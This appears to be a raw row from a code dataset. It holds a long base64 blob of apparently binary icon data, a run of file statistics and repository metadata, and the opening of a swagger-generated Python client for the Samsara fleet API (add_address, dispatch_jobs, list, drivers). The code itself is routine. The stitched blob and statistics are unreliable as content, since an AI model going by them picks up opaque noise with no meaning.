AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1LDIANS0zAzAoLhEZFBgJAAAAAQAAAAA3Ki8AOCowCjcpLw03KS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADEoLgAtJSoQOzI5mDszOqswKC51Jh8kNhAKDAcyKC42OC00fjYpMA83KzIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEw0SAA4GDAEYExcRGxYbMhwXHEgbGBxAGRYb
[base64-encoded binary image data (embedded icon payload and bitmask) omitted; not human-readable]
AAH//////wAAAAAAAAAAAAAB//////8AAAAAAAAAAAAAA///////AAAAAAAAAAAAAAf//////4AAAAAAAAAAAAAH//////+AAAAAAAAAAAAAA///////wAAAAAAAAAAAAAH//////8AAAAAAAAAAAAAB///////AAAAAAAAAAAAAAf//////4AAAAAAAAAAAAA///////+AAAAAAAAAAAAA////////wAAAAAAAAAAAAP///////8AAAAAAAAAAAAH////////gAAAAAAAAAAAB////////4AAAAAAAAAAAA/////////AAAAAAAAAAAAP////////wAAAAAAAAAAAD////////+AAAAAAAAAAAB/////////wAAAAAAAAAAAf////////8AAAAAAAAAAAP/////////gAAAAAAAAAAD/////////4AAAAAAAAAAB//////////AAAAAAAAAAAf/////////4AAAAAAAAAAH//////////AAAAAAAAAAD//////////4AAAAAAAAAA///////////AAAAAAAAAAf//////////8AwAAAAAAAP/////////////wAAAAAAH//////////////AAAAIAB//////////////8AAAHAA///////////////4AAH8Af///////////////wAH/wP/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////8='
| 15,038
| 90,206
| 0.913309
| 4,408
| 90,228
| 18.694646
| 0.438748
| 0.002039
| 0.002621
| 0.003653
| 0.027801
| 0.024173
| 0.020168
| 0.016249
| 0.013167
| 0.011747
| 0
| 0.058801
| 0.000089
| 90,228
| 5
| 90,207
| 18,045.6
| 0.854589
| 0.000122
| 0
| 0
| 0
| 1
| 0.999856
| 0.999856
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| c7a9658e990780238afba46b4c6aec62dd7d81ee
| 92,847
| py
| Python
| samsara/apis/default_api.py
| eirerocks/samsara-python-eu
| e0f1bd8f42d083fc713f910b74123d3bc7408538
| ["Apache-2.0"] | 1
| 2019-09-17T14:11:52.000Z
| 2019-09-17T14:11:52.000Z
| samsara/apis/default_api.py
| eirerocks/samsara-python-eu
| e0f1bd8f42d083fc713f910b74123d3bc7408538
| ["Apache-2.0"] | null | null | null
| samsara/apis/default_api.py
| eirerocks/samsara-python-eu
| e0f1bd8f42d083fc713f910b74123d3bc7408538
| ["Apache-2.0"] | null | null | null |
# coding: utf-8
"""
Samsara API
# Introduction The Samsara REST API lets you interact with the Samsara Cloud from anything that can send an HTTP request. With the Samsara API you can build powerful applications and custom solutions with sensor data. Samsara has endpoints available to track and analyze sensors, vehicles, and entire fleets. If you’re familiar with what you can build with a REST API, the following API reference guide will be your go-to resource. API access to the Samsara cloud is available to all Samsara administrators. If you’d like to try the API, [contact us](https://www.samsara.com/free-trial). The API is currently in beta and may be subject to frequent changes. # Connecting to the API There are two ways to connect to the API. If you prefer to use the API in Javascript or Python, we supply SDKs which you can download here: [Javascript SDK](https://github.com/samsarahq/samsara-js), [Python SDK](https://github.com/samsarahq/samsara-python). If you’d rather use another language to interact with the Samsara API, the endpoints and examples are in the reference guide below.
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class DefaultApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
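# --- Illustrative usage sketch; not part of the generated client. ---
# A minimal way to construct this wrapper, assuming the package is imported as
# `samsara` (matching this file's location, samsara/apis/default_api.py). Only
# DefaultApi, ApiClient and Configuration come from this package; everything else
# below is a placeholder.
#
#   from samsara.api_client import ApiClient
#   from samsara.apis.default_api import DefaultApi
#
#   api = DefaultApi()             # falls back to the ApiClient stored on Configuration()
#   api = DefaultApi(ApiClient())  # or inject an explicit ApiClient
#
# Every endpoint method below takes the Samsara `access_token` string first,
# followed by a request-body model, and POSTs JSON to the corresponding path.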
def add_fleet_address(self, access_token, address_param, **kwargs):
"""
/fleet/add_address
This method adds an address book entry to the specified group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_fleet_address(access_token, address_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param AddressParam address_param: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_fleet_address_with_http_info(access_token, address_param, **kwargs)
else:
(data) = self.add_fleet_address_with_http_info(access_token, address_param, **kwargs)
return data
def add_fleet_address_with_http_info(self, access_token, address_param, **kwargs):
"""
/fleet/add_address
This method adds an address book entry to the specified group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_fleet_address_with_http_info(access_token, address_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param AddressParam address_param: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'address_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_fleet_address" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `add_fleet_address`")
# verify the required parameter 'address_param' is set
if ('address_param' not in params) or (params['address_param'] is None):
raise ValueError("Missing the required parameter `address_param` when calling `add_fleet_address`")
collection_formats = {}
resource_path = '/fleet/add_address'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'address_param' in params:
body_params = params['address_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
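# Sketch of calling /fleet/add_address through the wrappers above, using the `api`
# instance from the construction sketch. The AddressParam model's fields are defined
# elsewhere in the generated package and are not reproduced here; `samsara.models`
# as the import location is an assumption based on the usual swagger-codegen layout.
#
#   from samsara.models import AddressParam             # assumed import path
#
#   param = AddressParam(...)                            # populate per the AddressParam model
#   api.add_fleet_address(access_token, param)           # synchronous: blocks until the POST returns
#
#   def on_response(resp):                               # asynchronous variant: pass a callback
#       print(resp)
#   thread = api.add_fleet_address(access_token, param, callback=on_response)
#   thread.join()                                        # with a callback, the call returns the request thread
#
# Passing None for either required argument raises ValueError, and any unrecognized
# keyword argument raises TypeError, as enforced in add_fleet_address_with_http_info above.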
def create_fleet_dispatch_jobs(self, access_token, create_dispatch_jobs_param, **kwargs):
"""
/fleet/dispatch_jobs/create
Create dispatch jobs in the specified group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_fleet_dispatch_jobs(access_token, create_dispatch_jobs_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param CreateDispatchJobsParam create_dispatch_jobs_param: (required)
:return: DispatchJobsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_fleet_dispatch_jobs_with_http_info(access_token, create_dispatch_jobs_param, **kwargs)
else:
(data) = self.create_fleet_dispatch_jobs_with_http_info(access_token, create_dispatch_jobs_param, **kwargs)
return data
def create_fleet_dispatch_jobs_with_http_info(self, access_token, create_dispatch_jobs_param, **kwargs):
"""
/fleet/dispatch_jobs/create
Create dispatch jobs in the specified group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_fleet_dispatch_jobs_with_http_info(access_token, create_dispatch_jobs_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param CreateDispatchJobsParam create_dispatch_jobs_param: (required)
:return: DispatchJobsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'create_dispatch_jobs_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_fleet_dispatch_jobs" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `create_fleet_dispatch_jobs`")
# verify the required parameter 'create_dispatch_jobs_param' is set
if ('create_dispatch_jobs_param' not in params) or (params['create_dispatch_jobs_param'] is None):
raise ValueError("Missing the required parameter `create_dispatch_jobs_param` when calling `create_fleet_dispatch_jobs`")
collection_formats = {}
resource_path = '/fleet/dispatch_jobs/create'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_dispatch_jobs_param' in params:
body_params = params['create_dispatch_jobs_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DispatchJobsResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_fleet(self, access_token, group_param, **kwargs):
"""
/fleet/list
Get a list of the vehicles. This method returns a list of the vehicles in the Samsara Cloud and information about them.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet(access_token, group_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupParam group_param: Group ID to query. (required)
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_fleet_with_http_info(access_token, group_param, **kwargs)
else:
(data) = self.get_fleet_with_http_info(access_token, group_param, **kwargs)
return data
def get_fleet_with_http_info(self, access_token, group_param, **kwargs):
"""
/fleet/list
Get a list of the vehicles. This method returns a list of the vehicles in the Samsara Cloud and information about them.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_with_http_info(access_token, group_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupParam group_param: Group ID to query. (required)
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'group_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fleet" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_fleet`")
# verify the required parameter 'group_param' is set
if ('group_param' not in params) or (params['group_param'] is None):
raise ValueError("Missing the required parameter `group_param` when calling `get_fleet`")
collection_formats = {}
resource_path = '/fleet/list'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'group_param' in params:
body_params = params['group_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
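# Sketch of listing vehicles via /fleet/list. Even though this is a read, the
# generated client issues a POST: the access token travels in the query string and
# the GroupParam travels in the JSON body. GroupParam's exact fields live in the
# generated models package; the group_id keyword shown here is illustrative only.
#
#   from samsara.models import GroupParam                # assumed import path
#
#   vehicles = api.get_fleet(access_token, GroupParam(group_id=101))
#   # `vehicles` is an InlineResponse2001 model whose attributes mirror the JSON payload.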
def get_fleet_dispatch_jobs(self, access_token, get_dispatch_jobs_param, **kwargs):
"""
/fleet/dispatch_jobs
Get the dispatch jobs for the specified group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_dispatch_jobs(access_token, get_dispatch_jobs_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GetDispatchJobsParam get_dispatch_jobs_param: (required)
:return: DispatchJobsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_fleet_dispatch_jobs_with_http_info(access_token, get_dispatch_jobs_param, **kwargs)
else:
(data) = self.get_fleet_dispatch_jobs_with_http_info(access_token, get_dispatch_jobs_param, **kwargs)
return data
def get_fleet_dispatch_jobs_with_http_info(self, access_token, get_dispatch_jobs_param, **kwargs):
"""
/fleet/dispatch_jobs
Get the dispatch jobs for the specified group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_dispatch_jobs_with_http_info(access_token, get_dispatch_jobs_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GetDispatchJobsParam get_dispatch_jobs_param: (required)
:return: DispatchJobsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'get_dispatch_jobs_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fleet_dispatch_jobs" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_fleet_dispatch_jobs`")
# verify the required parameter 'get_dispatch_jobs_param' is set
if ('get_dispatch_jobs_param' not in params) or (params['get_dispatch_jobs_param'] is None):
raise ValueError("Missing the required parameter `get_dispatch_jobs_param` when calling `get_fleet_dispatch_jobs`")
collection_formats = {}
resource_path = '/fleet/dispatch_jobs'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_dispatch_jobs_param' in params:
body_params = params['get_dispatch_jobs_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DispatchJobsResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_fleet_drivers(self, access_token, group_drivers_param, **kwargs):
"""
/fleet/drivers
Get all the drivers for the specified group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_drivers(access_token, group_drivers_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupDriversParam group_drivers_param: (required)
:return: DriversRespose
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_fleet_drivers_with_http_info(access_token, group_drivers_param, **kwargs)
else:
(data) = self.get_fleet_drivers_with_http_info(access_token, group_drivers_param, **kwargs)
return data
def get_fleet_drivers_with_http_info(self, access_token, group_drivers_param, **kwargs):
"""
/fleet/drivers
Get all the drivers for the specified group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_drivers_with_http_info(access_token, group_drivers_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupDriversParam group_drivers_param: (required)
:return: DriversRespose
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'group_drivers_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fleet_drivers" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_fleet_drivers`")
# verify the required parameter 'group_drivers_param' is set
if ('group_drivers_param' not in params) or (params['group_drivers_param'] is None):
raise ValueError("Missing the required parameter `group_drivers_param` when calling `get_fleet_drivers`")
collection_formats = {}
resource_path = '/fleet/drivers'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'group_drivers_param' in params:
body_params = params['group_drivers_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DriversRespose',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_fleet_drivers_summary(self, access_token, drivers_summary_param, **kwargs):
"""
/fleet/drivers/summary
Get the distance and time each driver in an organization has driven in a given time period.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
